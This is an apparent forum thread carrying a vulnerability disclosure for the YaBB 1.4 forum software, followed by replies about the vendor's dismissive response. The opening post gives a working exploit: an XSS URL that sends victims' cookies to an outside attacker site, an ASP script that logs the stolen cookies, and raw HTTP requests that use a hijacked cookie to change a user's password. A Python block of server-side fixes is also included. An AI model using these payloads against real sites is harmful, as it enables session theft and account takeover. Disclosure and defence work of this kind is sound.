The New YaBB Vulnerability!!!!
  1. #1
    Member
    Join Date
    May 2002
    Posts
    40

    The New YaBB Vulnerability!!!!

    OK Antionline, as I said earlier about finding security issues, my friend and I found 2 security issues in YaBB Forums, and here they are (this text we wrote is really fresh on the net) (P.S. voting will help me, thanks):


    Two security vulnerabilities in YaBB allow stealing users' cookies and hijacking users' accounts.

    Tested on:
    YaBB 1.4.0 & 1.4.1

    Summary :
    YaBB is a leading provider of free, downloadable php forums for webmasters. Two security vulnerabilities in the product allow a remote attacker to steal users' cookies, hijack users' accounts, and more. The issues discussed are:
    1. Cross Site Scripting Vulnerability on the login procedure.
    2. Unsecured changing profile method.

    *************** 1. Cross Site Scripting Vulnerability on the login procedure ******************

    If we log into YaBB forums and enter an invalid username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password field, allowing us to write malicious HTML and JavaScript into the page. From now on, stealing the username cookie is pretty easy. The method for this is creating a CSS vulnerability in the target site, forcing it to send the cookie to an .asp file we have created. This can be done by this statement:
    http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>

    Sending the above URL to someone can look suspicious to him, but we can build a site which has an invisible frame to that URL, which is a lot more dangerous.

    NOTE: YaBB doesn't allow us to use "=" or "%3d", so we have to catch the cookie without a Request("data") statement in the ASP file, because then we would need to put "data=" in the URL.

    OK, now let's build the hack.asp file, to log the cookie we are posting. The file should look like this:
    ------------------------------- hack.asp ------------------------------------
    <%
    Option Explicit

    Const ForWriting = 2
    Const ForAppending = 8
    Const Create = True

    Dim MyFile
    Dim FSO ' FileSystemObject
    Dim TSO ' TextStreamObject
    Dim Str
    Str = Request.ServerVariables("QUERY_STRING")

    MyFile = Server.MapPath("./db/log.txt")

    Set FSO = Server.CreateObject("Scripting.FileSystemObject")
    Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create)

    if (Str <> "") then TSO.WriteLine Str

    TSO.close
    Set TSO = Nothing
    Set FSO = Nothing
    %>
    <HTML>
    <BODY>
    You have just been hacked.
    </BODY>
    </HTML>
    ----------------------------------- EOF -----------------------------------

    This file writes Request.ServerVariables("QUERY_STRING"), which is the whole path we are posting after the "?", into a log file.


    ************* 2. Unsecured changing profile method ***************

    YaBB has a form to change users' details. The original password is not required when changing the password to a new one, meaning that if an attacker has someone else's cookie, he can change that user's password.

    - Defines:
    USERNAME - The username
    USERNAME COOKIE- The username cookie.

    - YaBB Cookie Explanation:
    The format of the YaBB cookie is something like:
    Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
    expiretime=1034304354
    After the attacker has got the cookie, he can use it to change the user's password. He can use the cookie even if the expiretime has passed by changing the cookie to the following:
    Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
    expiretime=9999999999

    This one will always work.

    - Exploiting the server and changing to a new password:
    First of all, if the attacker only wants to change the password and not the user details, he will have to get them from the server database, and only then build his POST request that will change the user's password. To do that, he also has to include the stolen cookie.

    To find out the user details, he will send this request to the server:

    ------------------------------------
    GET /forums/index.php?board=;action=profile;user=<USERNAME> HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
    Accept-Language: en-us
    Cookie: <USERNAME COOKIE>
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: www.victim.com
    Proxy-Connection: Keep-Alive
    ------------------------------------

    Then the server will return a form with the <USERNAME> details, and allow the attacker to change them. Note that the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now the attacker is ready to build his main POST request to change the user's password.

    The POST request might look like this :

    ------------------------------------
    POST /forums/index.php?board=;action=profile2 HTTP/1.1
    Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; TUCOWS; YComp 5.0.0.0)
    Host: www.victim.com
    Content-Length: 286
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Cookie: <USERNAME COOKIE>

    userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&email=victim@hotmail.com&gender=&bday1=00&bday2=00&bday3=0000&location=&websitetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimeformat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
    ------------------------------------

    All the details that the attacker sets are values taken from the form he got when he sent the GET request first (note that userID is a hidden value).
    You can see the "passwrd1" and "passwrd2" parameters that the attacker sends to the server.
    After sending the above POST request, the user's password will be changed to "HaCkEd".

    *************************************************************************

    - Possible Solution:
    For the CSS problem: Don't show the invalid username/password, or at least strip HTML tags from the password field.

    For the password changing problem:
    1. YaBB can save the IP of each user, and check the IP when someone asks to change his password. (Still not unbreakable, but much harder to exploit.)
    2. YaBB can also ask the user to enter the previous password before changing it to a new one. That way the attacker won't be able to break the forum protection by having only the user's cookie.

    -
    The security vulnerabilities were found by:

    Assaf Reshef
    Email: assaf@fullscreen.co.il

    Nir Adar
    Email: niradar@yahoo.com
    Web: http://underwar.livedns.co.il

    *************************************************************************

    Vendor status:
    10.10 First contact with the vendor, about the first security issue.
    11.10-16.10 Talking with the vendor. Vendor didn't take this seriously.
    18.10 Second contact about the second security issue.
    18.10 Vendor didn't take this issue seriously either.
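    The server-side fixes the post proposes (don't reflect the password unescaped, bind the cookie's expiretime to the server, and demand the current password on profile2), as an added Python example that is not YaBB's code. It assumes a constructed user table, an HMAC "sig" cookie field that YaBB never had, and an unsalted SHA-256 stand-in for the real password hash.

```python
import hashlib, hmac, html

# Constructed server-side state: a per-deployment secret and one user record.
SECRET = b"constructed-server-secret"
USERS = {"alice": hashlib.sha256(b"correct horse").hexdigest()}  # unsalted only for brevity

def sign(username, pw_hash, expiretime):
    """MAC over the cookie fields so the client cannot edit expiretime unnoticed."""
    msg = f"{username}|{pw_hash}|{expiretime}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()

def parse_cookie(header):
    """Split 'k=v; k=v' into a dict; values are exactly what the client sent."""
    fields = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            fields[key] = value
    return fields

def session_user(header, now):
    """Return the username if the cookie is untampered and unexpired, else None."""
    c = parse_cookie(header)
    user, pw, exp = c.get("YaBBusername", ""), c.get("YaBBpassword", ""), c.get("expiretime", "")
    if not hmac.compare_digest(c.get("sig", "").encode(), sign(user, pw, exp).encode()):
        return None  # forged field, e.g. expiretime rewritten to 9999999999
    if not exp.isdigit() or int(exp) <= now:
        return None  # expiry is judged by the server clock, not trusted from the cookie
    return user

def change_password(header, old_password, pw1, pw2, now):
    """profile2 handler that demands the current password, which YaBB 1.4 did not."""
    user = session_user(header, now)
    if user is None:
        return "invalid or expired session"
    stored = USERS.get(user)
    if stored is None or hashlib.sha256(old_password.encode()).hexdigest() != stored:
        return "current password incorrect"
    if pw1 != pw2 or len(pw1) < 8:
        return "new passwords do not match or are too short"
    USERS[user] = hashlib.sha256(pw1.encode()).hexdigest()
    return "ok"

def login_error(username, password):
    """Reflect the failed login safely: escaping makes <script> in passwrd inert."""
    return f"Invalid login for {html.escape(username)} / {html.escape(password)}"
```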

  2. #2
    Banned
    Join Date
    Oct 2002
    Posts
    9
    Excellent thread STeRoiD good finding.

  3. #3
    Senior Member
    Join Date
    Jul 2002
    Posts
    154
    Nice find. Just wondering about a couple of things.
    1. Why did you use asp? Something special? Or just a language you know?
    2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp pages. I dunno about xp home.
    3. Do you guys have a background in security or something? Or were you just very bored? I've been studying php portals, and found a few problems, but nothing as complicated as this.

  4. #4
    Junior Member
    Join Date
    Oct 2002
    Posts
    3

    Answers:

    > 1. Why did you use asp? Something special? Or just a language you know?

    Just language we know...

    >2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or
    > what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp
    > pages. I dunno about xp home.

    Examples of some of YaBB's replies:

    ------------------------------------------------------------------------------------------
    Well we're looking into it but we're not so sure what we're going to do
    with it. Basically this issue equates to: If someone steals my key for my
    house, it means there is a security hole. And really that ISN'T a security
    hole.
    ------------------------------------------------------------------------------------------
    If you guys can grab control of my user account on the main forums,
    I'll take this seriously. Take control of my account (username is *****) and
    post a message in the admin area, I will take a hard look at these...
    The developers weren't at all convinced that the first thing was a
    security hole and I'm not so sure this next one is either.
    ------------------------------------------------------------------------------------------


    > 3. Do you guys have a background in security or something? Or were you just very bored?
    > I've been studying phph portals, and found a few problems, but nothing as complicated as
    > this.

    We are programmers. Finding the bugs was easy - anyone can see that they don't ask for the previous password before changing it to a new one. Also, it is easy to find the CSS bug:
    simply type something like "whatever" in every text input you find, and test if it strips the tag or not.
    Exploiting the bugs - that is programming.


    Nir

  5. #5
    Senior Member
    Join Date
    Jul 2002
    Posts
    154
    > If you guys can grab control of my user account on the main forums,
    > I'll take this seriously. Take control of my account (username is *****) and
    > post a message in the admin area, I will take a hard look at these...
    That's foolish, lots of people can be socially engineered. To ignore the situation, well, it shows they aren't all that committed to the security of their product. They shouldn't hope that every user who uses YaBB knows better. Ignoring a flaw only proves that YaBB isn't the way to go if you're looking for a forum.
    Anyways, thanks for the post.

  6. #6
    Senior Member
    Join Date
    Apr 2002
    Posts
    634
    Good thread STeRoiD. One of my friends uses YaBB on his site. He will be mad to have to change one of his components again (last month it was the web server which was cracked).
    Life is boring. Play NetHack... --more--
